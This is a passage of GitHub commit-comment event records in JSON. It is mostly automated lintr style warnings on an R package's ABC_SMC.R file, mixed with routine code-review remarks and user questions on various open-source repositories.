^~~~~~~~\n```\n[R/ABC_SMC.R:256:5:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp;\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:256:17:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp;\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:257:16:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    weights <- nextWeights;\n               ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:259:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L259) *style:* **lines should not be more than 80 characters.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec, EveVec, DivVec, OptVec, fits, weights);\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:259:21:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec, EveVec, DivVec, OptVec, fits, weights);\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:259:31:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec, EveVec, DivVec, OptVec, fits, weights);\n                              ^~~~~~~~\n```\n[R/ABC_SMC.R:259:41:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec, EveVec, DivVec, OptVec, fits, weights);\n                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:259:51:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec, EveVec, DivVec, OptVec, fits, weights);\n                                                  ^~~~~~~\n```\n[R/ABC_SMC.R:259:60:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec, EveVec, DivVec, OptVec, fits, weights);\n                                                           ^~~~~~\n```\n[R/ABC_SMC.R:259:68:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec, EveVec, DivVec, OptVec, fits, weights);\n                                                                   ^~~~~~\n```\n[R/ABC_SMC.R:259:76:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec, EveVec, DivVec, OptVec, fits, weights);\n                                                                           ^~~~~~\n```\n[R/ABC_SMC.R:260:54:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L260) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL);\n                                                    ~^~\n```\n[R/ABC_SMC.R:263:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L263) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:19:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                  ^~~~~~~~\n```\n[R/ABC_SMC.R:263:35:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                  ^~~~~~~~\n```\n"}},"created_at":"2016-09-17T09:18:48Z"}
{"id":"4577657275","type":"CommitCommentEvent","actor":{"login":"flywayway"},"repo":{"name":"samba-team/samba"},"payload":{"comment":{"id":19064107,"position":null,"line":null,"path":null,"commit_id":"214ef25235eb51834675e0fd3ed0052aa171c40f","created_at":"2016-09-17T09:21:08Z","updated_at":"2016-09-17T09:21:08Z","body":"would I ask you a question? When smb.conf has been changed, how can I to forces  parameters to be flushed to a connection/service. I use \"smbcontrol ALL reload-config\", but it useless to a connected share."}},"created_at":"2016-09-17T09:21:08Z"}
{"id":"4577658875","type":"CommitCommentEvent","actor":{"login":"flywayway"},"repo":{"name":"samba-team/samba"},"payload":{"comment":{"id":19064118,"position":null,"line":null,"path":null,"commit_id":"bf22882ed31784d1fddee0c96ede35a4d5d34b24","created_at":"2016-09-17T09:22:41Z","updated_at":"2016-09-17T09:22:41Z","body":"would I ask you a question? When smb.conf has been changed, how can I to forces  parameters to be flushed to a connection/service. I use \"smbcontrol ALL reload-config\", but it useless to a connected share."}},"created_at":"2016-09-17T09:22:41Z"}
{"id":"4577659352","type":"CommitCommentEvent","actor":{"login":"Rayman"},"repo":{"name":"tue-robotics/navigation"},"payload":{"comment":{"id":19064122,"position":null,"line":null,"path":null,"commit_id":"fa7dba58e711cb52c8efde306e9d67146c74246f","created_at":"2016-09-17T09:23:08Z","updated_at":"2016-09-17T09:23:08Z","body":"Closes tue-robotics/tue_robocup#117"}},"created_at":"2016-09-17T09:23:08Z"}
{"id":"4577659519","type":"CommitCommentEvent","actor":{"login":"DaikiInaba"},"repo":{"name":"takebnn26/protospace"},"payload":{"comment":{"id":19064125,"position":4,"line":9,"path":"app/controllers/prototypes_controller.rb","commit_id":"6147d0e8f164f05f47270384d5718b12e9ba1d8a","created_at":"2016-09-17T09:23:16Z","updated_at":"2016-09-17T09:23:16Z","body":"binging.pry！"}},"created_at":"2016-09-17T09:23:16Z"}
{"id":"4577659994","type":"CommitCommentEvent","actor":{"login":"ielvxiao"},"repo":{"name":"ielvxiao/datatables"},"payload":{"comment":{"id":19064127,"position":5,"line":288,"path":"base.html","commit_id":"e0de41bdc595886d28c1d249fb139b6508aae5dd","created_at":"2016-09-17T09:23:42Z","updated_at":"2016-09-17T09:23:42Z","body":"# **datatables 可以像匹配内容一样为它增加属性比如class width等属性可以通过这种方式增加**"}},"created_at":"2016-09-17T09:23:42Z"}
{"id":"4577660596","type":"CommitCommentEvent","actor":{"login":"Rayman"},"repo":{"name":"tue-robotics/tue_robocup"},"payload":{"comment":{"id":19064128,"position":null,"line":null,"path":null,"commit_id":"3886824fe6fba54c04446f2e36cfae56d33b79ff","created_at":"2016-09-17T09:24:09Z","updated_at":"2016-09-17T09:24:09Z","body":"Closes tue-robotics/tue_robocup#111"}},"created_at":"2016-09-17T09:24:09Z"}
{"id":"4577661941","type":"CommitCommentEvent","actor":{"login":"flywayway"},"repo":{"name":"samba-team/samba"},"payload":{"comment":{"id":19064132,"position":null,"line":null,"path":null,"commit_id":"0c7ed5a8ab99aa2a5c9c40e3cea8ce1e58cfe30c","created_at":"2016-09-17T09:25:16Z","updated_at":"2016-09-17T09:25:16Z","body":"May I ask you a question? When smb.conf has been changed, how can I to forces  parameters to be flushed to a connection/service. I use \"smbcontrol ALL reload-config\", but it useless to a connected share."}},"created_at":"2016-09-17T09:25:16Z"}
{"id":"4577661994","type":"CommitCommentEvent","actor":{"login":"klappradla"},"repo":{"name":"kindr3d/discourse"},"payload":{"comment":{"id":19064133,"position":10,"line":33,"path":"app/controllers/admin/stats_controller.rb","commit_id":"8c038e84a4163a77c64ede3ec1ce2dd6402a7598","created_at":"2016-09-17T09:25:19Z","updated_at":"2016-09-17T09:25:19Z","body":"All these helper functions called **from** the index action can go into a `private` section of the controller, since they'll not be called from outside the controller.\r\n\r\nSo just like this:\r\n```ruby\r\ndef index\r\n  #...\r\nend\r\n\r\nprivate\r\n\r\ndef total_count\r\n  #...\r\nend\r\n\r\ndef user_stats(time_limit)\r\n  #...\r\nend\r\n```"}},"created_at":"2016-09-17T09:25:19Z"}
{"id":"4577662309","type":"CommitCommentEvent","actor":{"login":"oktawiraratama"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":19064134,"position":null,"line":null,"path":null,"commit_id":"fe129b2ae8d74b3ce1edb18675f7a480cd4d3479","created_at":"2016-09-17T09:25:36Z","updated_at":"2016-09-17T09:25:36Z","body":"Please add language indonesia 😀 "}},"created_at":"2016-09-17T09:25:36Z"}
{"id":"4577662588","type":"CommitCommentEvent","actor":{"login":"flywayway"},"repo":{"name":"samba-team/samba"},"payload":{"comment":{"id":19064135,"position":null,"line":null,"path":null,"commit_id":"ac7b63384d3f8afdb768f95e7744380f4df07d76","created_at":"2016-09-17T09:25:50Z","updated_at":"2016-09-17T09:25:50Z","body":"May I ask you a question? When smb.conf has been changed, how can I to forces  parameters to be flushed to a connection/service. I use \"smbcontrol ALL reload-config\", but it useless to a connected share."}},"created_at":"2016-09-17T09:25:50Z"}
{"id":"4577663139","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"phillipberndt/autorandr"},"payload":{"comment":{"id":19064136,"position":59,"line":800,"path":"autorandr.py","commit_id":"bae286948aaeced03357adccfb14d1ce84a568d1","created_at":"2016-09-17T09:26:19Z","updated_at":"2016-09-17T09:26:19Z","body":"What about using `ps e` to get the environment vars?"}},"created_at":"2016-09-17T09:26:19Z"}
{"id":"4577663775","type":"CommitCommentEvent","actor":{"login":"tonymorris"},"repo":{"name":"joshua-morris/learning"},"payload":{"comment":{"id":19064137,"position":29,"line":53,"path":"haskell/cis194/hw04/higher-order.hs","commit_id":"7ca5f55657ba993d283eb8fbe3a7e0b06e0e6b4b","created_at":"2016-09-17T09:26:54Z","updated_at":"2016-09-17T09:26:54Z","body":"xorr = (/=)"}},"created_at":"2016-09-17T09:26:54Z"}
{"id":"4577663875","type":"CommitCommentEvent","actor":{"login":"mechengg"},"repo":{"name":"mechengg/dplyr-data-manipulation"},"payload":{"comment":{"id":19064138,"position":296,"line":296,"path":"dplyrTutorial","commit_id":"506212b1cce87ebc457239180dc1030103e78db2","created_at":"2016-09-17T09:27:00Z","updated_at":"2016-09-17T09:27:00Z","body":"hflights %>% \r\ngroup_by(UniqueCarrier) %>%\r\nsummarise(p_canc = mean(Cancelled == 1)*100, avg_delay = mean(ArrDelay, na.rm= TRUE)) %>% \r\narrange(avg_delay, p_canc)"}},"created_at":"2016-09-17T09:27:00Z"}
{"id":"4577664287","type":"CommitCommentEvent","actor":{"login":"tonymorris"},"repo":{"name":"joshua-morris/learning"},"payload":{"comment":{"id":19064139,"position":38,"line":95,"path":"haskell/cis194/hw04/higher-order.hs","commit_id":"11e8f8148305e64d3cd509e9b2d4255ebaee6a2a","created_at":"2016-09-17T09:27:20Z","updated_at":"2016-09-17T09:27:20Z","body":"Explan it pls."}},"created_at":"2016-09-17T09:27:20Z"}
{"id":"4577665706","type":"CommitCommentEvent","actor":{"login":"taltultc"},"repo":{"name":"MattDavies/react-native-controllers"},"payload":{"comment":{"id":19064140,"position":null,"line":null,"path":null,"commit_id":"fb5dec7d4e53026cd11617ac86b093e4397c0df0","created_at":"2016-09-17T09:28:33Z","updated_at":"2016-09-17T09:28:33Z","body":"10x! works"}},"created_at":"2016-09-17T09:28:33Z"}
{"id":"4577666970","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19064141,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-17T09:29:41Z","updated_at":"2016-09-17T09:29:41Z","body":"13 yrs"}},"created_at":"2016-09-17T09:29:41Z"}
{"id":"4577667225","type":"CommitCommentEvent","actor":{"login":"AsenCoder"},"repo":{"name":"AsenCoder/oa"},"payload":{"comment":{"id":19064142,"position":null,"line":null,"path":null,"commit_id":"755600d6dd2c90e7bdf7e60baad739726ece9dbc","created_at":"2016-09-17T09:29:53Z","updated_at":"2016-09-17T09:29:53Z","body":"ok ！"}},"created_at":"2016-09-17T09:29:53Z"}
{"id":"4577670487","type":"CommitCommentEvent","actor":{"login":"vivierer"},"repo":{"name":"vivierer/git-tutorial"},"payload":{"comment":{"id":19064143,"position":4,"line":2,"path":"README.md","commit_id":"2ea2832b80700ab71f4cd37b6dc2dbc2a39e63ab","created_at":"2016-09-17T09:32:24Z","updated_at":"2016-09-17T09:32:24Z","body":"bvcbbcc"}},"created_at":"2016-09-17T09:32:24Z"}
{"id":"4577670901","type":"CommitCommentEvent","actor":{"login":"eddibravo"},"repo":{"name":"ostapqwert/genmvc"},"payload":{"comment":{"id":19064144,"position":9,"line":15,"path":"app/core/Router.php","commit_id":"14b121387292a856cf125fea2f535825115f6773","created_at":"2016-09-17T09:32:42Z","updated_at":"2016-09-17T09:32:42Z","body":"есть замечательная функция, ` parse_str ( string $str [, array &$arr ] )` используй её для парсинга `query`"}},"created_at":"2016-09-17T09:32:42Z"}
{"id":"4577672321","type":"CommitCommentEvent","actor":{"login":"vivierer"},"repo":{"name":"vivierer/git-tutorial"},"payload":{"comment":{"id":19064149,"position":5,"line":3,"path":"README.md","commit_id":"2ea2832b80700ab71f4cd37b6dc2dbc2a39e63ab","created_at":"2016-09-17T09:33:56Z","updated_at":"2016-09-17T09:33:56Z","body":"gdfgdfgdff"}},"created_at":"2016-09-17T09:33:56Z"}
{"id":"4577672444","type":"CommitCommentEvent","actor":{"login":"eddibravo"},"repo":{"name":"ostapqwert/genmvc"},"payload":{"comment":{"id":19064150,"position":22,"line":26,"path":"app/core/Router.php","commit_id":"14b121387292a856cf125fea2f535825115f6773","created_at":"2016-09-17T09:34:02Z","updated_at":"2016-09-17T09:34:02Z","body":"никаких `file_exists`! в этом нет необходимости. Тебе надо проверять не на наличие файла, а на наличие класса. А подгрузкой классов у тебя занимается autoload.php композера."}},"created_at":"2016-09-17T09:34:02Z"}
{"id":"4577672475","type":"CommitCommentEvent","actor":{"login":"grayich"},"repo":{"name":"vgough/encfs"},"payload":{"comment":{"id":19064151,"position":null,"line":null,"path":null,"commit_id":"b2a0e892c7171c30c0616bc44b9cfcbcf3def809","created_at":"2016-09-17T09:34:03Z","updated_at":"2016-09-17T09:34:03Z","body":"began to create a log file ~/logs/myeasylog.log\r\nthis is so conceived?\r\nhow to turn it off?\r\n"}},"created_at":"2016-09-17T09:34:03Z"}
{"id":"4577672530","type":"CommitCommentEvent","actor":{"login":"vivierer"},"repo":{"name":"vivierer/git-tutorial"},"payload":{"comment":{"id":19064152,"position":1,"line":1,"path":"README.md","commit_id":"2ea2832b80700ab71f4cd37b6dc2dbc2a39e63ab","created_at":"2016-09-17T09:34:06Z","updated_at":"2016-09-17T09:34:06Z","body":"nnnnnnnnnnnnnnnnnnnn"}},"created_at":"2016-09-17T09:34:06Z"}
{"id":"4577672802","type":"CommitCommentEvent","actor":{"login":"vivierer"},"repo":{"name":"vivierer/git-tutorial"},"payload":{"comment":{"id":19064153,"position":1,"line":1,"path":"README.md","commit_id":"2ea2832b80700ab71f4cd37b6dc2dbc2a39e63ab","created_at":"2016-09-17T09:34:20Z","updated_at":"2016-09-17T09:34:20Z","body":"gdfgdfgdfgdgdfgd"}},"created_at":"2016-09-17T09:34:20Z"}
{"id":"4577672964","type":"CommitCommentEvent","actor":{"login":"eddibravo"},"repo":{"name":"ostapqwert/genmvc"},"payload":{"comment":{"id":19064154,"position":27,"line":31,"path":"app/core/Router.php","commit_id":"14b121387292a856cf125fea2f535825115f6773","created_at":"2016-09-17T09:34:30Z","updated_at":"2016-09-17T09:34:30Z","body":"уже писал, убирай `require`"}},"created_at":"2016-09-17T09:34:30Z"}
{"id":"4577673068","type":"CommitCommentEvent","actor":{"login":"vivierer"},"repo":{"name":"vivierer/git-tutorial"},"payload":{"comment":{"id":19064155,"position":2,"line":2,"path":"README.md","commit_id":"2ea2832b80700ab71f4cd37b6dc2dbc2a39e63ab","created_at":"2016-09-17T09:34:36Z","updated_at":"2016-09-17T09:34:36Z","body":"hfghfghgfhfghfghfg"}},"created_at":"2016-09-17T09:34:36Z"}
{"id":"4577673814","type":"CommitCommentEvent","actor":{"login":"tjarratt"},"repo":{"name":"tjarratt/StreamCenter"},"payload":{"comment":{"id":19064156,"position":null,"line":null,"path":null,"commit_id":"2aa8fa05652553647a25e2e644a4192ff35492e4","created_at":"2016-09-17T09:35:12Z","updated_at":"2016-09-17T09:35:12Z","body":"@zacclark I got your Client-IDs right here.\r\n\r\nSwift 3 support added, still haven't cleaned up this branch OR cherry picked out the non-overscan related commits."}},"created_at":"2016-09-17T09:35:12Z"}
{"id":"4577674153","type":"CommitCommentEvent","actor":{"login":"ltratt"},"repo":{"name":"softdevteam/krun"},"payload":{"comment":{"id":19064158,"position":10,"line":62,"path":"libkrun/libkruntime.c","commit_id":"a59c97edda3e1d7f4fdbc9f6e504d54af7cd35e1","created_at":"2016-09-17T09:35:29Z","updated_at":"2016-09-17T09:35:29Z","body":"This comment is a bit confusing, as it appears to be defining something pointless ;) I know, however, that the API means we need to pass a mask. So how about something like \"[AM]Perf return 64 bit values, hence the 64 bit mask.\"?"}},"created_at":"2016-09-17T09:35:29Z"}
{"id":"4577675315","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19064163,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-17T09:36:23Z","updated_at":"2016-09-17T09:36:23Z","body":"1+3=4 years old\n\nOn Sep 17, 2016 2:59 PM, \"Omkar\" <notifications@github.com> wrote:\n\n> 13 yrs\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sud-vastav/android_device_oneplus_onyx/commit/36966fd3a7caced28fea663d77847f55dad7a71c#commitcomment-19064141>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJpnff_XoKe2QtVjNmeNB7LYi6L1PN1Uks5qq7MGgaJpZM4J-Jtr>\n> .\n>\n"}},"created_at":"2016-09-17T09:36:23Z"}
{"id":"4577675558","type":"CommitCommentEvent","actor":{"login":"ltratt"},"repo":{"name":"softdevteam/krun"},"payload":{"comment":{"id":19064164,"position":119,"line":407,"path":"libkrun/libkruntime.c","commit_id":"a59c97edda3e1d7f4fdbc9f6e504d54af7cd35e1","created_at":"2016-09-17T09:36:36Z","updated_at":"2016-09-17T09:36:36Z","body":"Maybe we should update this comment in the light of APERF/MPERF which are much more likely to overflow?"}},"created_at":"2016-09-17T09:36:36Z"}
{"id":"4577676008","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19064165,"position":null,"line":null,"path":null,"commit_id":"9a98bebbd29e83695001db6fb6946d85cc3ea609","created_at":"2016-09-17T09:36:56Z","updated_at":"2016-09-17T09:36:56Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:8:40:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​    a <- sample(1:3, size = 1, prob = x-floor(x) )\n                                      ~^~\n```\n[R/ABC_SMC.R:9:19:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​    x2[a] <- x2[a]+1;\n                 ~^~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigM,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:45:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigM,\n                                            ^~~~\n```\n[R/ABC_SMC.R:23:29:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L23) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            dispVals, filtVals, compVals,\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:23:39:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L23) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            dispVals, filtVals, compVals,\n                                      ^~~~~~~~\n```\n[R/ABC_SMC.R:23:49:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L23) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            dispVals, filtVals, compVals,\n                                                ^~~~~~~~\n```\n[R/ABC_SMC.R:24:29:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L24) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            numParticles, W)  {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:28:25:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L28) *style:* **Variable and function names should be all lowercase.**\n```r\n​  for (i in 1:seq_along(dispVals)) {\n                        ^~~~~~~~\n```\n[R/ABC_SMC.R:29:5:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(dispVals[i], filtVals[i], compVals[i])\n    ^~~~~\n```\n[R/ABC_SMC.R:29:16:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(dispVals[i], filtVals[i], compVals[i])\n               ^~~~~~~~\n```\n[R/ABC_SMC.R:29:29:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(dispVals[i], filtVals[i], compVals[i])\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:29:42:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(dispVals[i], filtVals[i], compVals[i])\n                                         ^~~~~~~~\n```\n[R/ABC_SMC.R:30:30:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L30) *style:* **Variable and function names should be all lowercase.**\n```r\n​    diff <- params[target] - prevP[target]\n                             ^~~~~\n```\n[R/ABC_SMC.R:31:50:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​    vals[i] <- W[i] * dnorm(diff, mean = 0, sd = sigM)\n                                                 ^~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:44:24:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L44) *style:* **Variable and function names should be all lowercase.**\n```r\n​perturb <- function(p, sigM)  {\n                       ^~~~\n```\n[R/ABC_SMC.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    cat(\"Found previously finished run, loaded results from that run\\n\")\n^\n```\n[R/ABC_SMC.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    return(output);\n^\n```\n[R/ABC_SMC.R:49:34:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​  x <- sample(numbers, 3, replace=F)\n                                ~^~\n```\n[R/ABC_SMC.R:51:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L51) *style:* **Variable and function names should be all lowercase.**\n```r\n​  oldVal <- params[x[1]]\n  ^~~~~~\n```\n[R/ABC_SMC.R:53:65:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L53) *style:* **Variable and function names should be all lowercase.**\n```r\n​  params[x[1]] <- round(params [x[1]] + rnorm(1, mean = 0, sd = sigM), 0)\n                                                                ^~~~\n```\n[R/ABC_SMC.R:57:27:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L57) *style:* **Variable and function names should be all lowercase.**\n```r\n​  diff <- params [x[1]] - oldVal\n                          ^~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:72:20:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L72) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  Fit_Rich <- (abs((rich - obs[,1])) / sd_vals[1])^2;\n                   ^\n```\n[R/ABC_SMC.R:72:33:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L72) *style:* **Commas should always have a space after.**\n```r\n​  Fit_Rich <- (abs((rich - obs[,1])) / sd_vals[1])^2;\n                                ^\n```\n[R/ABC_SMC.R:72:51:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​  Fit_Rich <- (abs((rich - obs[,1])) / sd_vals[1])^2;\n                                                 ~^~\n```\n[R/ABC_SMC.R:73:20:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  Fit_Even <- (abs((even - obs[,2])) / sd_vals[2])^2;\n                   ^\n```\n[R/ABC_SMC.R:73:33:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L73) *style:* **Commas should always have a space after.**\n```r\n​  